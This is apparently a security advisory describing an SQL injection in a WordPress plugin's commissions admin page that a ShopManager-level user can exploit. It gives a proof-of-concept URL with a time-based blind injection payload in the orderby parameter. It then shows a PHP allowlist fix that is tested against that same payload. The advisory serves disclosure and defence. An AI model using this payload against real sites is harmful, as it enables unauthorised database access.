The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high-privilege users such as ShopManager.
As ShopManager, open the URL below:
https://example.com/wp-admin/admin.php?page=wcpv-commissions&orderby=order_id`,(select+sleep(10)+from+dual+where+database()+like+database())--+-
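
One way to close this class of bug for the orderby parameter shown above is to map the request value onto a fixed allowlist of column identifiers. This is an added example, not the plugin's own code or its actual fix; the function name and every column other than order_id are hypothetical.

```php
<?php
// Added example: allowlist mapping for a sortable list-table query.
// Column identifiers cannot be bound as prepared-statement parameters,
// so the request value must never be copied into the SQL text.

function build_order_clause(?string $orderby, ?string $order): string
{
    // Request key => real column. Only order_id appears on the page;
    // the other entries are hypothetical.
    $allowed = [
        'order_id'   => 'order_id',
        'order_date' => 'order_date',
        'vendor'     => 'vendor_name',
    ];

    $key    = is_string($orderby) ? strtolower(trim($orderby)) : '';
    // Anything outside the allowlist falls back to a fixed default.
    $column = array_key_exists($key, $allowed) ? $allowed[$key] : 'order_id';

    // The sort direction is also request-controlled, so it gets the same treatment.
    $direction = (is_string($order) && strtoupper(trim($order)) === 'ASC') ? 'ASC' : 'DESC';

    // Both parts of the returned clause come from constants in this function.
    return sprintf('ORDER BY `%s` %s', $column, $direction);
}

// Constructed inputs: two normal requests, the orderby value from the URL
// above (URL-decoded), and a malformed sort direction.
$samples = [
    ['order_id', 'asc'],
    ['vendor', null],
    ['order_id`,(select sleep(10) from dual where database() like database())-- -', 'desc'],
    [null, 'asc; --'],
];

foreach ($samples as [$orderby, $order]) {
    echo build_order_clause($orderby, $order), PHP_EOL;
}
```

The third sample is not a key in the allowlist, so the clause falls back to the default column and none of the request text reaches the query.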